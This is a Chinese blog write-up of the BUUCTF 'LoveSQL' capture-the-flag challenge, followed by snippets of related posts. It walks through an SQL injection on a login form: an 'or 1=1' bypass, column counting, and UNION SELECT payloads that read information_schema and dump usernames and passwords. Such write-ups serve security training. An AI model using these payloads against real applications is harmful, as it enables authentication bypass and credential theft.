buuctf-[极客大挑战 2019]LoveSQL1（小宇特详解）

最新推荐文章于 2024-10-12 17:00:17 发布

小宇特详解

最新推荐文章于 2024-10-12 17:00:17 发布

阅读量1.5k

点赞数 3

文章标签：安全

本文链接：https://blog.csdn.net/xhy18634297976/article/details/122515467

版权

buuctf-[极客大挑战 2019]LoveSQL1（小宇特详解）

1.这里有账号和密码，这里先尝试一下万能密码（在账号那里注入）

1' or 1=1#

密码随便

在这里插入图片描述

这里继续进行注入，判断有几列

1' order by 3;#

在这里插入图片描述

这里试一试4

1' order by 4;#

在这里插入图片描述

这里通过union联合查询

1' union select 1,2,3;#

在这里插入图片描述

这里的2，3都是注入点

这里开始按部就班的注入吧

1' union select 1,2,database();#

在这里插入图片描述

1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database();#

在这里插入图片描述

1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1';#

在这里插入图片描述

1' union select 1,database(),group_concat(id,username,password) from l0ve1ysq1;#

在这里插入图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

小宇特详解

关注关注

3
点赞
踩
6

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

[极客大挑战 2019]LoveSQL

kuller_Yan的博客

05-19

333

[极客大挑战 2019]LoveSQL-------wp from Kuller_yan 先打开靶场看看题目一看就和上一题 easysql 尝试万能钥匙1' or 1=1 # 看起来像md5解密，但是解密失败，继续查询字段，admin' order by 3 # admin' order by 4 # 到4的时候没有正常返回，然后用1' union select 1,2,3 # 回显点为2，3；然后用1' union select 1,database(), version() # 可以看到库名

BUUCTF-[极客大挑战 2019]PHP 1

qq_57345310的博客

10-13

715

打开题目，首先是一只猫，真可爱。首先我们根据题目提示，用dirsearch扫描目录。（按理说御剑也是可以的，但我没有尝试）但要注意，可能会扫不出来备份文件，多扫几次就出来了。如果没有dirsearch,上百度上搜，有很多安装教程和使用教程最终我们扫到一个备份文件.www.zip 于是我们回到网页，拼接www.zip后就下载到了源码，解压后，可以看见里面有几个文件但很可惜，flag.php文件里的flag是假的。但这里还是...

1 条评论您还未登录，请先登录后发表或查看评论

CTF做题笔记–[极客大挑战 2019]LoveSQL1

2301_81609355的博客

06-05

184

先说说我走过的弯路，呜呜~开局一个登录框，废话不多说，直接注！啥情况啊这，俺要flag，不要密码！！！这我一看，心想稳了，结果一顿操作注：MariaDB和MySQL差不多我心想，geek不是数据库名吗，心想从库里获取所有信息应该没啥问题，怎么会不行呢。后来才知道得具体到表才能查询。在不知道表名的情况下肯定查不出来，所以这波纯属自己SQL学的不扎实。之后看这样查不到，就尝试以下方法接下来，我的操作你可能看不懂，因为没啥用：）

BUUCTF-[GUET-CTF2019]re(Reverse逆向)

最新发布

书山有路勤为径，学海无涯苦作舟

10-12

969

BUUCTF-re-[GUET-CTF2019]re Z3约束求解器_博客再写是因为自己再复现了一遍，希望加深印象，增强理解。

CTF---BUUCTF之[极客大挑战 2019]LoveSQL 1

weixin_44632787的博客

06-17

1557

CTF练习题里的BUUCTF之[极客大挑战 2019]LoveSQL 1 启动我们的挑战项目，这题一看就知道是SQL注入了。。。而且跟上一次做的好像，不知道这一次的难不难。先来随便输入个“万能钥匙”吧！1’ or 1=1 # 嗯哼？这个是MD5加密吗？上网找一下MD5在线加解密的网站：https://www.cmd5.com/。看看能不能得到我们想要的答案果然没解出来，照理说CTF的题不会这么简单。这个可能是一个陷阱，或者是另外一种解法（反正我不会…）。所以，我们试试正常的解题思路吧！先用

Buuctf [极客大挑战 2019]LoveSQL 1

m0_64444909的博客

07-21

724

代码】BuuCTF[极客大挑战2019]LoveSQL1。

【CTF_SQL】[极客大挑战 2019]LoveSQL 1

十二_的博客

10-22

1708

的WP来学习他们的思路，多刷题，以形成自己的思路，常刷，常总是不可避免的，尽管菜鸟小编并做不到。一般的套路使用之后，我们要先熟悉这个数据库相关SQL注入的基本语法或公式，才能进一步破解；这里，我们就需要对常用的一些编码格式有一定的了解。本道题，我们要观察它是什么编码？一开始，对于菜鸟级别的我们来说，一般是不了解的。再来回想一下，我们刚才出现的编码是什么？编码，参加过全国大学生数学建模大赛的或者知道。进入环境，我们就尝试去最经典的万能密码。不信，咱们最好还是测试一下吧，有点像。所以，sql注入是可以的~~~

BUUCTF[极客大挑战 2019]LoveSQL1

weixin_53955759的博客

06-18

230

这一题和easysql页面一样

Buuctf-Web-[极客大挑战 2019]EasySQL 1 题解及思路总结

ccc6553584的博客

04-03

902

输入11"时，没有SQL语句报错，只是提示我们输入的值是不对的，因此我们可以先假设SQL语句闭合方式是单引号username输入1时，形成的sql语句是username输入1"时，形成的sql语句是正确的当字符串内需要包含双引号时，除了使用转义字符外，也可以使用一对单引号来包括字符串。字符串内的双引号被视为普通字符，无需特殊处理同理，当字符串内需要包含单引号时，除了使用转义字符外，也可以使用一对双引号来包括字符串。字符串内的单引号被视为普通字符，无需特殊处理username输入的是1'

【BUUCTF-Web】[极客大挑战 2019]Upload

weixin_49298681的博客

01-05

1158

Upload=> 文件上传漏洞。

BUUCTF-Web:[极客大挑战 2019]Upload

m0_56161093的博客

05-29

948

题目解题过程 1、上传文件从网页上来看是上传一个图片文件，但我们不知道他的检查上传的文件，所以可以试一试上传各种文件。一般检查文件的地方有：后缀名、content-type、文件头的部分内容。这里我们先上传一个php文件,不做任何修改。如下图：结果如下： 2、修改文件后缀名和content-type 将文件名修改为test.phtml，绕过常规php文件后缀检测将文件类型修改为：image/jpeg 注意：phtml一般是指嵌入了php代码的html文件，但是同样也会作为php解析修

[极客大挑战 2019]LoveSQL 1

Huamang的博客

02-02

729

万能密码先试一波发现直接进去了，但是给了一串不是flag的东西，我拿去解码也没用，我就卡住了接下来就是查询字段数从一试到四，发现只有三个字段接下来是联合查询原理： union select1,2,3...#找到了原来表的字段数后写上相同数量的数字，他会构造临时记录（这个操作一般是测试注入点）当然也可以查询其他的信息比如库的名字和版本因为第二个查询没有条件发现这个没效果，因为admin这个记录里存在的值，所以我们试记录里没有的值回显了2和3，可以猜测第二个字段是我们的名字，第

[极客大挑战 2019]LoveSQL 1（SQL注入）

小谢的博客

06-12

5087

[极客大挑战 2019]LoveSQL 1（SQL注入）

buu [极客大挑战 2019]LoveSQL 1

weixin_45642610的博客

01-10

2053

buu [极客大挑战 2019]LoveSQL 1 -刷题个人日记小白一个，写给自己看。进去后是这样：用户名输入1和1'测试发现1'报错有sql语法错误，说明有sql注入点且后台数据库是MariaDB 用户名输入sql注入基本公式：1' or 1=1;# 结果： 3bba40d66c98e28cf3bac11b45edbbab像是md5编码，试试解码后不行。可能flag在其他表里，我们要知道有哪些表且表的属性有哪些。慢慢来，payload： check.php?username=admin'

buuctf web 极客大挑战2019

08-24

嗨！对于BUUCTF Web极客大挑战2019，我了解到它是一个网络安全比赛，由北方工业大学举办。这个比赛旨在考察参赛者的网络攻防能力和Web漏洞挖掘技术。比赛的题目涵盖了Web安全的各个方面，包括但不限于漏洞利用、代码审计和网络协议等。参赛者需要通过解决各个题目来获取相应的flag，以证明自己的能力。如果你有具体的问题或需要更详细的信息，我会尽力帮助你。